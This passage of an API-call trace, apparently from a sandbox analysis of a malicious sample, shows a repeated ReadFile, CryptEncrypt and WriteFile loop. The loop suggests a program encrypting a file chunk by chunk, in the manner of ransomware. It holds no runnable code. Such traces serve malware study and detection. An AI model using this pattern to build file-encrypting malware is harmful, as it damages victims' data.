lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.534] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.534] GetLastError () returned 0x0 [0167.534] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.534] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.535] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.535] GetLastError () returned 0x0 [0167.535] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.535] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.535] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.535] GetLastError () returned 0x0 [0167.535] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.535] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.535] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.535] GetLastError () returned 0x0 [0167.535] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.535] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.535] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.535] GetLastError () returned 0x0 [0167.535] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.535] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.535] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.535] GetLastError () returned 0x0 [0167.535] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.535] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.535] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.535] GetLastError () returned 0x0 [0167.535] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.535] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.535] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.535] GetLastError () returned 0x0 [0167.536] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.536] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.536] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.536] GetLastError () returned 0x0 [0167.536] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.536] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.536] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.536] GetLastError () returned 0x0 [0167.536] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.536] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.536] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.536] GetLastError () returned 0x0 [0167.536] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.536] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.536] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.536] GetLastError () returned 0x0 [0167.536] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.536] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.536] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.536] GetLastError () returned 0x0 [0167.536] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.536] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.536] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.536] GetLastError () returned 0x0 [0167.536] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.537] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.537] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.537] GetLastError () returned 0x0 [0167.537] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.537] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.537] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.537] GetLastError () returned 0x0 [0167.537] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.537] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.537] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.537] GetLastError () returned 0x0 [0167.537] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.537] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.537] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.537] GetLastError () returned 0x0 [0167.537] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.537] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.537] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.537] GetLastError () returned 0x0 [0167.537] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.537] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.537] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.537] GetLastError () returned 0x0 [0167.537] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.537] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.538] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.538] GetLastError () returned 0x0 [0167.538] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.538] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.538] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.538] GetLastError () returned 0x0 [0167.538] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.538] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.538] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.539] GetLastError () returned 0x0 [0167.539] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.539] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.539] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.539] GetLastError () returned 0x0 [0167.539] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.539] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.539] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.539] GetLastError () returned 0x0 [0167.539] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.539] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.539] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.539] GetLastError () returned 0x0 [0167.539] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.539] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.539] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.539] GetLastError () returned 0x0 [0167.539] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.539] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.539] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.539] GetLastError () returned 0x0 [0167.539] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.539] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.540] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.540] GetLastError () returned 0x0 [0167.540] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.540] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.540] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.540] GetLastError () returned 0x0 [0167.540] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.540] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.540] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.540] GetLastError () returned 0x0 [0167.540] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.540] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.540] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.540] GetLastError () returned 0x0 [0167.540] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.540] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, 